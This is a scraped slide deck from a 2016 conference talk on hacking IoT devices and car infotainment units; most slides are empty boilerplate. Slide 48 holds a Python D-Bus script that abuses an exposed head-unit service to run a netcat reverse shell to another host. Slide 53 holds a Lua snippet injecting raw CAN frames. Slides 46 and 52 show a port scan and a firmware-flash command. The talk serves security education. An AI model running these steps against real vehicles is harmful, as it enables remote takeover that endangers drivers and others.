Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Wearable botnets 201560319_v3

205 views

Published on

"Wearable Botnets and Happy Hacked Drivers" by Andrea Pompili
Bill Gates prediction has been outdated: Computers are spreading everywhere, and they will be connected and meshed together outdating all current implementation models. But what about security? Talking about hacked ADSL modems, hijacked railways video screens and car's control unit secrets, we'll start to review the real vulnerabilities of this new world, demystifying threats and actors who have already moved in this profitable black-market.

Published in: Internet
  • Be the first to comment

  • Be the first to like this

Wearable botnets 201560319_v3

  1. 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. WEARABLE BOTNETS AND HAPPY HACKED DRIVERS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't
  2. 2. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  3. 3. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  4. 4. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. R8C/25 Group 64 KB Flash memory 3 KB RAM
  5. 5. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. NC30 standard library statically linked
  6. 6. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  7. 7. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  8. 8. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. http://deadhacker.com/2010/02/03/jtag-enumeration/ http://openocd.org/doc/html/Debug-Adapter-Hardware.html https://github.com/synthetos/PiOCD/wiki/Using-a-Raspberry-Pi-as-a-JTAG-Dongle
  9. 9. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. http://www.dataman.com E8a (R0E00008AKCE00)
  10. 10. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. http://www.limpkin.fr/index.php?post/2012/04/30/Hacking-a-laundry-machine-in-one-day-%28SLE4442%29
  11. 11. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  12. 12. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  13. 13. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  14. 14. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  15. 15. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  16. 16. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  17. 17. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  18. 18. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  19. 19. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  20. 20. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  21. 21. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  22. 22. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  23. 23. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  24. 24. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  25. 25. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  26. 26. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  27. 27. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  28. 28. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  29. 29. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  30. 30. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  31. 31. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  32. 32. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  33. 33. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  34. 34. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  35. 35. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  36. 36. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. Multiple Bus (max 1Mbps) UART or I2C (19.2Kbaud) High Speed and Reliable (10Mbps) Optical fiber (150Mbps)
  37. 37. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. SAE J1979
  38. 38. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  39. 39. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  40. 40. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  41. 41. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  42. 42. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  43. 43. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  44. 44. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  45. 45. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  46. 46. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDT Nmap scan report for 192.168.5.1 Host is up (0.0036s latency). PORT STATE SERVICE 2011/tcp open raid-cc 2021/tcp open servexec 4400/tcp open unknown 6010/tcp open x11 6020/tcp open unknown 6667/tcp open irc 51500/tcp open unknown 65200/tcp open unknown
  47. 47. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. https://www.freedesktop.org/wiki/Software/dbus/
  48. 48. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. #!python import dbus bus_obj = dbus.bus.BusConnection("tcp:host=192.168.5.1, port=6667") proxy_object = bus_obj.get_object( 'com.harman.service.NavTrailService', '/com/harman/service/NavTrailService') playerengine_iface = dbus.Interface( proxy_object, dbus_interface='com.harman.ServiceIpc') print playerengine_iface.Invoke( 'execute', '{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}')
  49. 49. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. 21.0.0.0/8
  50. 50. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. 21.0.0.0/8
  51. 51. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. 21.0.0.0/8 21.0.0.0/8
  52. 52. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. iocupdate -c 4 -p usr/share/V850/cmcioc.bin
  53. 53. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. SCLK MOSI MISO SS SCLK MOSI MISO SS ipc = require("ipc") file = '/dev/ipc/ch7' g = assert(ipc.open(file)) -- f0,02,39|91,LEN,CAN1,CAN2,CAN3,CAN4,DATA0,DATA1... g:write(0xf0, 0x02, 91, 0x08, 0xf1, 0x86, 0xda, 0xf8, 0x05, 0x2F, 0x51, 0x06, 0x03, 0x10, 0x00, 0x00)
  54. 54. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp.
  55. 55. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. 
  56. 56. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ ROME 18-19.03.2016 www.codemotionworld.com Andrea Pompili apompili@hotmail.com – Xilogic Corp. Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian

×